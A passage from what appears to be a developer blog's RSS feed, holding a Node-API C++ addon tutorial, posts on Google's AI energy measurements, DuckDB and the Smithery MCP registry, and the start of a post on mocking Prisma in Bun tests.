  <span class="hljs-comment">// and return it. This value will be the result of calling the function</span>
  <span class="hljs-comment">// from your Node.js code.</span>
  <span class="hljs-keyword">return</span> Napi::String::New(env, <span class="hljs-string">"Hello World from C++!"</span>);
}

<span class="hljs-comment">// The Init function is the entry point for the Node.js addon.</span>
<span class="hljs-comment">// It's responsible for setting up the exports that will be available</span>
<span class="hljs-comment">// in JavaScript when the addon is required.</span>
<span class="hljs-function">Napi::Object <span class="hljs-title">Init</span><span class="hljs-params">(Napi::Env env, Napi::Object exports)</span> </span>{
  <span class="hljs-comment">// Set a property on the 'exports' object.</span>
  <span class="hljs-comment">// The first argument is the name of the export (how you'll call it in JS).</span>
  <span class="hljs-comment">// The second argument is a Napi::Function that wraps our native C++ function.</span>
  exports.Set(Napi::String::New(env, <span class="hljs-string">"hello"</span>),
              Napi::Function::New(env, HelloWorld));

  <span class="hljs-comment">// Return the modified exports object.</span>
  <span class="hljs-keyword">return</span> exports;
}

<span class="hljs-comment">// This macro registers the addon with Node.js.</span>
<span class="hljs-comment">// The first argument is the addon's name (must match 'target_name' in binding.gyp).</span>
<span class="hljs-comment">// The second argument is the initialization function we just defined.</span>
NODE_API_MODULE(hello_world_addon, Init)
</code></pre>
<p>This is the core C++ source code. It defines the HelloWorld function that returns a string and an Init function that exports HelloWorld under the name hello.</p>
<h3 id="heading-step-3-build-config">Step 3: Build Config</h3>
<p>Create binding.gyp</p>
<pre><code class="lang-json">{
<span class="hljs-attr">"targets"</span>: [
  {
    <span class="hljs-attr">"target_name"</span>: <span class="hljs-string">"hello_world_addon"</span>,
    <span class="hljs-attr">"sources"</span>: [ <span class="hljs-string">"hello.cpp"</span> ],
    <span class="hljs-attr">"include_dirs"</span>: [
       <span class="hljs-string">"&lt;!@(node -p "</span>require('node-addon-api').include<span class="hljs-string">")"</span>
     ],
     <span class="hljs-attr">"defines"</span>: [ <span class="hljs-string">"NAPI_DISABLE_CPP_EXCEPTIONS"</span> ]
   }
 ]
}
</code></pre>
<p>This is a build configuration file for node-gyp. It tells the compiler which C++ files to compile (sources), what to name the final binary (target_name), and where to find the necessary header files (include_dirs).</p>
<h3 id="heading-step-4-build-the-addon">Step 4: Build the Addon</h3>
<pre><code class="lang-bash">node-gyp configure build
</code></pre>
<p>This generates <code>build/Release/addon.node</code></p>
<h3 id="heading-step-5-use-it-in-nodejs">Step 5: Use It in Node.js</h3>
<p>Create index.js</p>
<pre><code class="lang-javascript"><span class="hljs-keyword">const</span> addon = <span class="hljs-built_in">require</span>(<span class="hljs-string">'./build/Release/hello_world_addon.node'</span>);

<span class="hljs-built_in">console</span>.log(addon.hello()); <span class="hljs-comment">// → "Hello from Node-API!"</span>
</code></pre>
<p>Run it:</p>
<pre><code class="lang-javascript">node index.js
</code></pre>
<p>You can find the entire source code for the helloworld addon in the following Github</p>
<div class="embed-wrapper"><div class="embed-loading"><div class="loadingRow"></div><div class="loadingRow"></div></div><a class="embed-card" href="https://github.com/nidhinkumar06/N-API-Example">https://github.com/nidhinkumar06/N-API-Example</a></div>
<p> </p>
<h2 id="heading-5how-n-api-differs-from-worklets-or-webassembly">5.How N-API differs from Worklets or WebAssembly?</h2>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1757783959208/3d07d722-31b3-4de3-a410-a3dbe88c9350.png" alt class="image--center mx-auto" /></p>
<ul>
<li><p><strong>Node-API</strong> → bridge to native C++ in Node.js.</p>
</li>
<li><p><strong>Worklets</strong> → lightweight JS workers in browser rendering.</p>
</li>
<li><p><strong>WebAssembly</strong> → portable, high-performance modules for both browser + Node.js.</p>
</li>
</ul>
<h2 id="heading-6node-api-and-hermes">6.Node-API and Hermes</h2>
<p><strong>Hermes</strong> — a JavaScript engine built by Meta for React Native. It’s optimized for:</p>
<ul>
<li><p>Fast startup</p>
</li>
<li><p>Low memory usage</p>
</li>
<li><p>Small binary size</p>
</li>
</ul>
<p>Node.js usually runs on <strong>V8</strong>, but the community has experimented with <strong>running Node.js on Hermes</strong>.</p>
<p>Here’s why Node-API is important:</p>
<ul>
<li><p>Node-API is <strong>engine-independent</strong>.</p>
</li>
<li><p>If Node.js runs on V8, ChakraCore, or Hermes, your addon still works.</p>
</li>
<li><p>Without Node-API, you’d have to rewrite bindings for every engine.</p>
</li>
</ul>
<h3 id="heading-example">Example</h3>
<p>Think of <strong>Node-API</strong> as a <strong>universal power adapter</strong>:</p>
<ul>
<li><p>V8 = US plug</p>
</li>
<li><p>Hermes = EU plug</p>
</li>
<li><p>ChakraCore = UK plug</p>
</li>
</ul>
<p>Without Node-API, you’d need a different charger each time. With Node-API, your addon plugs in anywhere.</p>
<h2 id="heading-7resources-amp-links">7.Resources &amp; Links</h2>
<h3 id="heading-node-api"><strong>Node-API</strong></h3>
<ul>
<li><p>Documentation: <a target="_blank" href="https://nodejs.org/api/n-api.html">https://nodejs.org/api/n-api.html</a></p>
</li>
<li><p>Examples: <a target="_blank" href="https://github.com/nodejs/node-addon-examples">https://github.com/nodejs/node-addon-examples</a></p>
</li>
</ul>
<h3 id="heading-node-api-bindings"><strong>Node-API bindings</strong></h3>
<ul>
<li><p>Engine bindings doc: <a target="_blank" href="https://github.com/nodejs/abi-stable-node/blob/doc/node-api-engine-bindings.md">https://github.com/nodejs/abi-stable-node/blob/doc/node-api-engine-bindings.md</a></p>
</li>
<li><p>C++ API: <a target="_blank" href="https://github.com/nodejs/node-addon-api">https://github.com/nodejs/node-addon-api</a></p>
</li>
<li><p>C# API: <a target="_blank" href="https://github.com/microsoft/node-api-dotnet">https://github.com/microsoft/node-api-dotnet</a></p>
</li>
<li><p>JSI API: <a target="_blank" href="https://github.com/microsoft/node-api-jsi">https://github.com/microsoft/node-api-jsi</a></p>
</li>
</ul>
<h3 id="heading-node-api-for-hermes"><strong>Node-API for Hermes</strong></h3>
<ul>
<li><p>Hermes PR: <a target="_blank" href="https://github.com/facebook/hermes/pull/1377">https://github.com/facebook/hermes/pull/1377</a></p>
</li>
<li><p>Hermes Windows fork: <a target="_blank" href="https://github.com/microsoft/hermes-windows">https://github.com/microsoft/hermes-windows</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[The Carbon Cost of AI: How Google Measures Its Energy Use]]></title><description><![CDATA[Google’s Sustainability team recently released a technical paper explaining how it measures the environmental footprint of AI inference — the stage where trained AI models generate text, images, or predictions. While AI has the potential to drive mas...]]></description><link>https://blog.nidhin.dev/the-carbon-cost-of-ai-how-google-measures-its-energy-use</link><guid isPermaLink="true">https://blog.nidhin.dev/the-carbon-cost-of-ai-how-google-measures-its-energy-use</guid><category><![CDATA[AI]]></category><category><![CDATA[Artificial Intelligence]]></category><category><![CDATA[sustainability]]></category><category><![CDATA[Google AI]]></category><category><![CDATA[carbon footprint]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Fri, 22 Aug 2025 19:07:56 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1755888325935/1e620257-a82c-49b0-9d15-8c9814322f48.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Google’s Sustainability team recently released a technical paper explaining how it measures the environmental footprint of AI inference — the stage where trained AI models generate text, images, or predictions. While AI has the potential to drive massive economic and scientific progress, its growing energy demands raise important questions about sustainability.</p>
<h3 id="heading-how-much-energy-does-an-ai-prompt-use">How Much Energy Does an AI Prompt Use?</h3>
<p>According to Google’s analysis, a typical Gemini text prompt consumes about <strong>0.24 watt-hours of energy</strong>, produces <strong>0.03 grams of Carbon emissions</strong>, and uses <strong>0.26 milliliters of water</strong> — roughly equivalent to watching TV for less than nine seconds.</p>
<p>Interestingly, over just 12 months, the energy and carbon footprint of a Gemini text prompt have dropped by <strong>33x and 44x</strong> respectively, It happens because due to the advancements in model efficiency, hardware, and data center performance.</p>
<h3 id="heading-why-measuring-ais-footprint-is-complex">Why Measuring AI’s Footprint Is Complex</h3>
<p>Google emphasizes that measuring AI’s environmental cost isn’t as simple as looking at active chip usage. A full picture needs to include:</p>
<ul>
<li><p><strong>Idle capacity</strong> kept ready for reliability and traffic spikes.</p>
</li>
<li><p><strong>CPU and RAM usage</strong>, which support model execution.</p>
</li>
<li><p><strong>Data center overhead</strong>, such as cooling and power distribution.</p>
</li>
<li><p><strong>Water consumption</strong> for cooling systems.</p>
</li>
</ul>
<p>Many estimates in the public domain focus only on GPU/TPU consumption, which Google says can underestimate the true footprint by more than half.</p>
<h3 id="heading-efficiency-through-a-full-stack-approach">Efficiency Through a Full-Stack Approach</h3>
<p>Google attributes its efficiency gains to a <em>full-stack strategy</em> — improving AI across every layer, from hardware to algorithms to data centers. Key contributors include:</p>
<ul>
<li><p><strong>Smarter model architectures</strong> like <a target="_blank" href="https://arxiv.org/abs/1701.06538">Mixture-of-Experts</a>, which only activate parts of a model needed for a task.</p>
</li>
<li><p><strong>Algorithmic improvements</strong> such as quantization, reducing energy use without sacrificing accuracy.</p>
</li>
<li><p><strong>Optimized serving methods</strong> like speculative decoding and <a target="_blank" href="https://arxiv.org/abs/1503.02531">distilled models</a> (e.g., Gemini Flash) that handle queries with fewer computations.</p>
</li>
<li><p><strong>Custom TPUs</strong> designed for maximum performance per watt, now 30x more efficient than the first generation.</p>
</li>
<li><p><strong>Ultra-efficient data centers</strong> running at a fleet-wide average <a target="_blank" href="https://datacenters.google/efficiency/">PUE (Power Usage Effectiveness) of 1.09</a>, powered increasingly by carbon-free energy.</p>
</li>
</ul>
<h3 id="heading-google-2025-environment-report">Google 2025 Environment Report</h3>
<p>Based on Google's 2025 Environmental Report, the carbon emitted from Google's data centres in the last year, 2024, was approximately <strong>2.5 million metric tons of carbon dioxide equivalent (tCO2e).</strong></p>
<p>For broader context, Google's total operational emissions (which include all Scope 1 and Scope 2 market-based emissions for all Google and Alphabet Inc. operations, including offices, not just data centres) for 2024 were <strong>3,132,200 tCO2e</strong></p>
<p>To know more about the environment report. - <a target="_blank" href="https://www.gstatic.com/gumdrop/sustainability/google-2025-environmental-report.pdf">https://www.gstatic.com/gumdrop/sustainability/google-2025-environmental-report.pdf</a></p>
<h3 id="heading-looking-ahead">Looking Ahead</h3>
<p>Google acknowledges that the job isn’t done. It continues to push for further efficiency improvements while pursuing its broader goals of 24/7 carbon-free operations and water replenishment. By publishing its methodology, Google hopes to set a standard for how the industry measures the true environmental footprint of AI.</p>
<blockquote>
<p>As we build more powerful AI, we must remember the planet isn’t ours alone.</p>
</blockquote>
<h3 id="heading-reference-links">Reference Links</h3>
<ol>
<li><p>Research Paper - <a target="_blank" href="https://arxiv.org/abs/2508.15734">https://arxiv.org/abs/2508.15734</a></p>
</li>
<li><p>Distilling a knowledge in Neural Network - <a target="_blank" href="https://arxiv.org/abs/1503.02531">https://arxiv.org/abs/1503.02531</a></p>
</li>
<li><p>2025 Environment Report - <a target="_blank" href="https://www.gstatic.com/gumdrop/sustainability/google-2025-environmental-report.pdf">https://www.gstatic.com/gumdrop/sustainability/google-2025-environmental-report.pdf</a></p>
</li>
</ol>
]]></content:encoded></item><item><title><![CDATA[DuckDB]]></title><description><![CDATA[DuckDB an in-process, analytical database management system(DBMS) designed for Online Analytical Processing (OLAP) workloads. It is build to handle large datasets and complex queries quickly, focusing on data analysis and reporting. It is designed to...]]></description><link>https://blog.nidhin.dev/duckdb</link><guid isPermaLink="true">https://blog.nidhin.dev/duckdb</guid><category><![CDATA[duckDB]]></category><category><![CDATA[Databases]]></category><category><![CDATA[DBMS]]></category><category><![CDATA[columnar dbs]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Fri, 15 Aug 2025 17:56:48 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1755280470738/d1e8a09b-dc64-4e0d-8616-d44fabf4eae0.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>DuckDB an in-process, analytical database management system(DBMS) designed for Online Analytical Processing (OLAP) workloads. It is build to handle large datasets and complex queries quickly, focusing on data analysis and reporting. It is designed to be embedded directly into the application much like SQLite.</p>
<h2 id="heading-key-features-and-characteristics">Key Features and Characteristics</h2>
<h2 id="heading-1-in-process-execution">1. In-Process Execution</h2>
<p>Like SQLite, DuckDB doesn’t require a separate server process.It runs within the same process as your application, making it easy to deploy and use without complex server setups.</p>
<h2 id="heading-2-columnar-storage">2. Columnar Storage</h2>
<p>DuckDB uses a columnar storage format.This means data is stored column-by-column rather than row-by-row. This is a significant advantage for analytical queries because it allows the database to read only the columns needed for query, leading to faster performance, especially when aggregating or filtering on a few columns needed for a query, leading to faster performance, especially when aggregating or filtering on a few columns within very wide tables.</p>
<h2 id="heading-3-optimized-query-execution">3. Optimized Query Execution</h2>
<p>DuckDB features a sophisticated query optimizer that analyzes queries and chooses the most efficient execution plan. It includes techniques like</p>
<ul>
<li><p><strong>Vectorized Processing</strong> - Operations are performed on batches of data (vectors) at a time, leveraging CPU parallelism for significant speedups.</p>
</li>
<li><p><strong>Just-In-Time(JIT) Compilation</strong>- Parts of the query execution plan can be compiled to native machine code during runtime, allowing for further optimization.</p>
</li>
<li><p><strong>Pushdown of Operations</strong> - DuckDB can push down operations like filters and aggregations to storage so that only the necessary data is read from storage.</p>
</li>
<li><p><strong>SQL Standard Compliance</strong> - It aims for a high degree of SQL standard compliance, making it easier to migrate existing SQL code and learn the database.</p>
</li>
<li><p><strong>Extensibility</strong> - DuckDB supports extensions for reading various file formats(CSV, Parquet, JSON, Excel) directly. Integration with other data sources like PostgreSQL, Custom functions and aggregations.</p>
</li>
<li><p><strong>Focus on Read-Heavy Workloads</strong>: DuckDB is optimized for read-heavy workloads, which is common in data analysis and reporting. Writes are supported, but the performance is not as optimized as read.</p>
</li>
<li><p><strong>Designed for Analytics</strong>: It’s primary use case is analyzing data, making it a good choice for data scientists analysts, and anyone working with large datasets for reporting, dashboard and exploratory analysis and anyone working with large datasets for reporting, dashboards and exploratory analysis.</p>
</li>
</ul>
<h2 id="heading-4-comparison-of-duckdb-vs-sqlite"><strong>4. Comparison of DuckDB vs SQLite</strong></h2>
<div class="hn-table">
<table>
<thead>
<tr>
<td><strong>Feature</strong></td><td><strong>DuckDB</strong></td><td><strong>SQLite</strong></td></tr>
</thead>
<tbody>
<tr>
<td><strong>Primary Use Case</strong></td><td>Analytical (OLAP)</td><td>General Purpose (OLTP, Small OLAP)</td></tr>
<tr>
<td><strong>Storage</strong></td><td>Columnar</td><td>Row-oriented</td></tr>
<tr>
<td><strong>Performance</strong></td><td>Faster for complex analytical queries on larger datasets</td><td>Faster for transactional (OLTP)</td></tr>
<tr>
<td><strong>Query Optimization</strong></td><td>Optimized for large datasets</td><td>Works well for small to medium datasets, slow with very large dataset</td></tr>
<tr>
<td><strong>Concurrency</strong></td><td>Limited write concurrency</td><td>Good read and write concurrency</td></tr>
<tr>
<td><strong>Server</strong> <strong>Required</strong></td><td>No</td><td>No</td></tr>
</tbody>
</table>
</div><h2 id="heading-5-installation-of-duckdb">5. Installation of DuckDB</h2>
<p>DuckDB is supported in the following languages like Python, R, Rust, Node.js, Java, ODBC and GO and you can find the installation steps for each language in their official documentation - <a target="_blank" href="https://duckdb.org/docs/stable/">https://duckdb.org/docs/stable/</a></p>
<h2 id="heading-6-tools-powered-by-duckdb">6. Tools Powered by DuckDB</h2>
<ul>
<li><p><a target="_blank" href="https://github.com/rilldata/rill">Rill Data</a> - Tool for effortlessly transforming data sets into powerful, opinionated dashboards using SQL.</p>
</li>
<li><p><a target="_blank" href="https://ibis-project.org/">Ibis Project</a> - A DataFrame API for interacting with DuckDB (and other compute engines).</p>
</li>
<li><p><a target="_blank" href="https://boilingdata.com/">Boiling Data</a> - Serverless data analytics overlay on top of S3 Data Lakes.</p>
</li>
<li><p><a target="_blank" href="https://learn.hex.tech/docs/explore-data/cells/sql-cells/sql-cells-introduction">Hex Dataframe SQL</a> - Hex's Dataframe SQL cells are powered by DuckDB.</p>
</li>
<li><p><a target="_blank" href="https://mode.com/blog/how-we-switched-in-memory-data-engine-to-duck-db-to-boost-visual-data-exploration-speed/">Mode</a> - Mode uses DuckDB for their in-memory data engine.</p>
</li>
<li><p><a target="_blank" href="https://vulcansql.com/">VulcanSQL</a> - DuckDB can be used as a caching layer or a data connector in VulcanSQL, a Data API framework for data folks to create REST APIs by writing SQL templates.</p>
</li>
<li><p><a target="_blank" href="https://www.tadviewer.com/">Tad</a> - A fast, free, cross-platform tabular data viewer application powered by DuckDB.</p>
</li>
<li><p><a target="_blank" href="https://www.honeycombmaps.com/">Honeycomb Maps</a> - A browser-based geospatial analysis tool leveraging DuckDB-Wasm.</p>
</li>
<li><p><a target="_blank" href="https://www.bauplanlabs.com/">Bauplan</a> - A serverless data transformation platform for data lakes.</p>
</li>
<li><p><a target="_blank" href="https://www.malloydata.dev/">Malloy</a> - Malloy is an experimental language for describing data relationships and transformations. Malloy connects to BigQuery, Snowflake, Trino, and Postgres, and natively supports DuckDB.</p>
</li>
<li><p><a target="_blank" href="https://evidence.dev/">Evidence</a> - Generate reports using SQL and markdown. The DuckDB connector allows querying across DuckDB, CSV, Parquet and JSON.</p>
</li>
<li><p><a target="_blank" href="https://latitude.so/">Latitude</a> - Latitude uses DuckDB to power data snapshots. Drop a CSV file and query it with SQL at the speed of light.</p>
</li>
<li><p><a target="_blank" href="https://www.getcensus.com/">Census</a> - Census's dataset diffing for incremental syncs is powered by DuckDB.</p>
</li>
<li><p><a target="_blank" href="https://github.com/rpbouman/huey">Huey</a> - Blazing-fast &amp; intuitive pivot tables on Parquet, CSV, JSON files and DuckDB tables in the browser based on DuckDB-Wasm. open-source (MIT). Zero install!</p>
</li>
<li><p><a target="_blank" href="https://marketplace.visualstudio.com/items?itemName=AdamViola.parquet-explorer">Parquet Explorer</a> - Visual Studio Code extension for exploring Parquet files with SQL, powered by DuckDB.</p>
</li>
<li><p><a target="_blank" href="https://dqops.com/">DQOps</a> - Data quality platform for data engineers, data quality teams and data operations.</p>
</li>
<li><p><a target="_blank" href="https://github.com/javitorres/datalakeStudio">DatalakeStudio</a> - Load, explore, transform your datasets and expose them via API. Integration with external APIs, S3, PostgreSQL and ChatGPT.</p>
</li>
<li><p><a target="_blank" href="https://github.com/spiceai/spiceai">Spice.ai</a> - A unified SQL query interface and portable runtime to locally materialize (using an embedded DuckDB), accelerate, and query datasets from any database, data warehouse, or data lake.</p>
</li>
<li><p><a target="_blank" href="https://www.definite.app/">Definite</a> - Definite pulls all your data into a single place for analytics and dashboards. No engineering or SQL required. Get a managed data warehouse (DuckDB), ELT, data modeling / transformations and BI in a single platform.</p>
</li>
<li><p><a target="_blank" href="https://github.com/amphi-ai/amphi-etl">Amphi ETL</a> - Low-code data pipelines for structured and unstructured data. SQL transformations are powered by DuckDB.</p>
</li>
<li><p><a target="_blank" href="https://github.com/metrico/quackpipe">Quackpipe</a> - Serverless OLAP API/UI built on top of DuckDB with basic ClickHouse API compatibility and MotherDuck support.</p>
</li>
<li><p><a target="_blank" href="https://github.com/buremba/universql">UniverSQL</a> - An implementation of Snowflake API, enables running queries on Snowflake tables locally with DuckDB without a running warehouse.</p>
</li>
<li><p><a target="_blank" href="https://github.com/ajl2718/whereabouts">Whereabouts</a> - Fast, accurate, open-source geocoding in Python, using DuckDB.</p>
</li>
<li><p><a target="_blank" href="https://github.com/lalabuy948/PhoenixAnalytics">Phoenix Analytics</a> - Plug and play analytics for Phoenix applications, powered by DuckDB.</p>
</li>
<li><p><a target="_blank" href="https://github.com/tobymao/sqlglot">SQLGlot</a> - Python transpiler that translates between 24 different SQL dialects including DuckDB.</p>
</li>
<li><p><a target="_blank" href="https://github.com/Bl3f/yato">yato</a> - The smallest DuckDB SQL orchestrator on Earth.</p>
</li>
<li><p><a target="_blank" href="https://github.com/TobikoData/sqlmesh">SQLMesh</a> - A next-generation data transformation and modeling framework with support for DuckDB connections for state, transformations &amp; running unit tests locally.</p>
</li>
<li><p><a target="_blank" href="https://github.com/danilo-css/analytics-data-pivot">ADPivot</a> - No code tool built on top of DuckDB-Wasm and Pyodide that helps build pivot tables from databases of any size with a few clicks.</p>
</li>
<li><p><a target="_blank" href="https://kepler.gl/">Kepler.gl</a> - Kepler.gl is a powerful open-source geospatial analysis tool for large-scale data sets, now embeds duckdb wasm to create geospatial layers.</p>
</li>
<li><p><a target="_blank" href="https://github.com/wylie102/duckdb.yazi">duckdb.yazi</a> - Preview csv/tsv, json, and Parquet files in the yazi file manager using duckdb. View the raw data, or a "summarized" view with data-types, min, max, avg etc. for all columns.</p>
</li>
<li><p><a target="_blank" href="https://www.greybeam.ai/">Greybeam</a> - Routes your Snowflake queries to a DuckDB powered warehouse to reduce costs and speed up queries.</p>
</li>
<li><p><a target="_blank" href="https://datakit.page/">Datakit</a> - The privacy-first data analysis toolkit.</p>
</li>
<li><p><a target="_blank" href="https://github.com/turbot/tailpipe">Tailpipe</a> - An open-source SIEM for instant log insights.</p>
</li>
<li><p><a target="_blank" href="https://github.com/realdatadriven/etlx">ETLX</a> - DuckDB-powered ETL tool written in Go, inspired by evidence.dev’s syntax. It uses a structured Markdown config where heading levels define nested blocks, yaml code blocks specify metadata, and sql code blocks handle data interactions. Enables clean, code-light orchestration with minimal setup.</p>
</li>
<li><p><a target="_blank" href="https://hugr-lab.github.io/">Hugr</a> - An data mesh platform and high-performance GraphQL backend powered by DuckDB.</p>
</li>
</ul>
<h2 id="heading-final-notes">Final Notes</h2>
<p>DuckDB excels at analytical workloads, leveraging columnar storage and advanced query optimization techniques for speed. It is suited to data science, reporting, and applications where large datasets are queried often.</p>
<p>SQLite is a general-purpose database that is best suited for transactional applications and smaller datasets, and is designed for ease of use and embeddability.</p>
<p>Choose the database that best fits your specific needs and workload.</p>
]]></content:encoded></item><item><title><![CDATA[Supercharge Your AI Agents with Smithery AI: The MCP Registry You Need to Know]]></title><description><![CDATA[AI agents are evolving fast—from just chatbots to context-aware powerhouses that can browse the web, query databases, automate dev tasks, and even control smart home devices. But how exactly do you plug an LLM into real-world tools safely and efficie...]]></description><link>https://blog.nidhin.dev/supercharge-your-ai-agents-with-smithery-ai-the-mcp-registry-you-need-to-know</link><guid isPermaLink="true">https://blog.nidhin.dev/supercharge-your-ai-agents-with-smithery-ai-the-mcp-registry-you-need-to-know</guid><category><![CDATA[AI]]></category><category><![CDATA[#ai-tools]]></category><category><![CDATA[agentic AI]]></category><category><![CDATA[smithery]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Sat, 28 Jun 2025 17:06:35 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1751125160077/aae43ae7-a437-4ddd-b516-f5c3fb31f033.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>AI agents are evolving fast—from just chatbots to context-aware powerhouses that can browse the web, query databases, automate dev tasks, and even control smart home devices. But how exactly do you plug an LLM into real-world tools safely and efficiently?</p>
<p>That’s where Smithery AI comes in</p>
<h3 id="heading-what-is-smithery-ai">What Is Smithery AI?</h3>
<p>Think of <strong>Smithery AI</strong> as a <strong>package manager and registry for AI tools</strong>—but not the usual Python/Node packages. Instead, it catalogs <strong>MCP servers</strong> (Model Context Protocol), which are tiny APIs or plugins that extend the capabilities of large language models (LLMs) like Claude, GPT, or open-source agents.</p>
<p>Need GitHub access for your AI agent? There’s an MCP server for that. Want your LLM to query SQL databases or automate browser actions? Yup, there’s one for that too.</p>
<p>Smithery helps you discover, install, and manage these servers either:</p>
<ul>
<li><p><strong>Locally</strong>: Everything runs on your machine, tokens never leave.</p>
</li>
<li><p><strong>Remotely</strong>: Hosted by Smithery, convenient for fast prototyping.</p>
</li>
</ul>
<h3 id="heading-what-you-can-do-with-it">What you can do with it</h3>
<p>Here are some real-world use cases where Smithery + MCP servers shine:</p>
<ul>
<li><p><strong>GitHub MCP</strong>: Let your agent search issues, PRs, or even suggest reviews.</p>
</li>
<li><p><strong>PostgreSQL/SQL MCPs</strong>: Ask your LLM to analyze your data tables.</p>
</li>
<li><p><strong>Web MCPs</strong>: Build agents that browse and summarize web pages.</p>
</li>
<li><p><strong>Playwright MCP</strong>: Control browser sessions for automated testing via LLM prompts.</p>
</li>
<li><p><strong>Local file system access</strong>: Let agents read/write files (with strict permission control).</p>
</li>
</ul>
<p>With over <strong>200+ MCP servers</strong>, the ecosystem is growing fast.</p>
<h3 id="heading-installing-an-mcp-server">Installing an MCP Server</h3>
<p>If you want to install the GitHub MCP locally you need to use the following command locally</p>
<pre><code class="lang-typescript">smithery install --server=github.com/smithery-ai/mcp-github --token=$GITHUB_TOKEN
</code></pre>
<p>This spins up the GitHub MCP on your local machine and gives you a <code>.well-known/mcp</code> descriptor for any LLM client to hook into.</p>
<p>Boom. You’ve just given your AI superpowers.</p>
<h3 id="heading-is-it-safe">Is It Safe?</h3>
<p>A few community folks <a target="_blank" href="https://www.reddit.com/r/mcp/comments/1hg9u8f/be_careful_with_using_smithery/">raised concerns on Reddit</a> about early versions of the Smithery CLI being minified, making it hard to audit. The devs responded quickly, pledging to open-source everything.</p>
<p>Until then, <strong>use local mode with caution</strong>—just like you would with any CLI that handles access tokens. For hosted servers, Smithery claims tokens are passed ephemerally and never stored long-term.</p>
<p>Smithery also supports developers building their own AI-driven tools. If you're writing a React app, backend service, or your own agent framework, there's a <strong>TypeScript SDK</strong> and API spec to connect to hosted MCPs.</p>
<h3 id="heading-conclusion">Conclusion</h3>
<p>Smithery AI feels like a missing piece in the AI agent puzzle. Instead of reinventing tool integrations every time, you get a standardised, modular plug-and-play system.</p>
<p>And with the open MCP standard, you're not locked in—you can mix and match servers, clients, and hosts.</p>
<p>If you're building anything agentic, LLM-enhanced, or just plain nerdy... this is worth exploring.</p>
<h3 id="heading-resources-links">Resources Links</h3>
<ol>
<li><p>Smithery AI Docs - <a target="_blank" href="https://smithery.ai/docs">https://smithery.ai/docs</a></p>
</li>
<li><p>GitHub MCP - <a target="_blank" href="https://github.com/smithery-ai/mcp-github">https://github.com/smithery-ai/mcp-github</a></p>
</li>
<li><p>Reddit Discussion - <a target="_blank" href="https://www.reddit.com/r/mcp/comments/1hg9u8f/be_careful_with_using_smithery/">https://www.reddit.com/r/mcp/comments/1hg9u8f/be_careful_with_using_smithery/</a></p>
</li>
</ol>
]]></content:encoded></item><item><title><![CDATA[Mock Prisma Schema in Bun Tests]]></title><description><![CDATA[Writing unit tests for your code is usually straightforward when using popular test frameworks like Jest or Vitest. You can easily mock dependencies and focus your specs on specific units of logic. However, when working with Bun — especially if you’r...]]></description><link>https://blog.nidhin.dev/mock-prisma-schema-in-bun-tests</link><guid isPermaLink="true">https://blog.nidhin.dev/mock-prisma-schema-in-bun-tests</guid><category><![CDATA[buntest]]></category><category><![CDATA[Bun]]></category><category><![CDATA[Testing]]></category><category><![CDATA[prisma]]></category><category><![CDATA[unit testing]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Sun, 22 Jun 2025 14:58:04 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1750604176345/49b4c80d-ef1c-4879-a46c-7473da8ee4ce.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Writing unit tests for your code is usually straightforward when using popular test frameworks like <strong>Jest</strong> or <strong>Vitest</strong>. You can easily mock dependencies and focus your specs on specific units of logic. However, when working with <strong>Bun</strong> — especially if you’re trying to mock Prisma database interactions — things can be a bit different.</p>
<p>In this post, we’ll explore two approaches for mocking Prisma in Bun</p>
<h2 id="heading-1spying-on-methods-with-spyon">1.Spying on Methods with <code>spyOn</code></h2>
<p>If you want to track method calls (like Prisma Client methods), you can use Bun’s built-in <code>spyOn</code> method from <code>bun:test</code>. This is ideal when you just want to observe behavior and assert how methods were called.</p>
<h3 id="heading-example">Example</h3>
<pre><code class="lang-typescript"> <span class="hljs-keyword">import</span> { test, expect, spyOn } <span class="hljs-keyword">from</span> <span class="hljs-string">"bun:test"</span>;
 <span class="hljs-keyword">import</span> { PrismaClient } <span class="hljs-keyword">from</span> <span class="hljs-string">"@prisma/client"</span>;
 <span class="hljs-keyword">const</span> prisma = <span class="hljs-keyword">new</span> PrismaClient();

test(<span class="hljs-string">"should find user by id"</span>, <span class="hljs-keyword">async</span> () =&gt; {
  <span class="hljs-keyword">const</span> spy = spyOn(prisma.user, <span class="hljs-string">"findUnique"</span>);
  <span class="hljs-keyword">await</span> prisma.user.findUnique({ where: { id: <span class="hljs-number">1</span> } });
  expect(spy).toHaveBeenCalledTimes(<span class="hljs-number">1</span>);
  expect(spy.mock.calls[<span class="hljs-number">0</span>][<span class="hljs-number">0</span>]).toEqual({ where: { id: <span class="hljs-number">1</span> } });
});
</code></pre>
<h2 id="heading-2mock-the-entire-module">2.Mock the Entire Module</h2>
<p>Consider this example: we have a function that fetches a user from the database based on an ID.</p>
<pre><code class="lang-typescript"><span class="hljs-keyword">import</span> { getDbClient } <span class="hljs-keyword">from</span> <span class="hljs-string">'~/lib/getDbClient'</span>;

<span class="hljs-keyword">export</span> <span class="hljs-keyword">async</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">findUser</span>(<span class="hljs-params">id: <span class="hljs-built_in">number</span></span>) </span>{
  <span class="hljs-keyword">const</span> db = getDbClient();
  <span class="hljs-keyword">const</span> user = <span class="hljs-keyword">await</span> db.user.findUnique({ where: { entity_id: id } });

  <span class="hljs-keyword">if</span> (!user) <span class="hljs-keyword">return</span> { status: <span class="hljs-string">'redirect'</span>, redirectUrl: href(<span class="hljs-string">'/login'</span>)};

  <span class="hljs-keyword">return</span> { status: <span class="hljs-string">'valid'</span>, user };
}
</code></pre>
<p>Here, <code>getDbClient()</code> returns the Prisma instance, and we use its <code>findUnique()</code> method to locate a user.</p>
<h3 id="heading-the-challenge">The Challenge</h3>
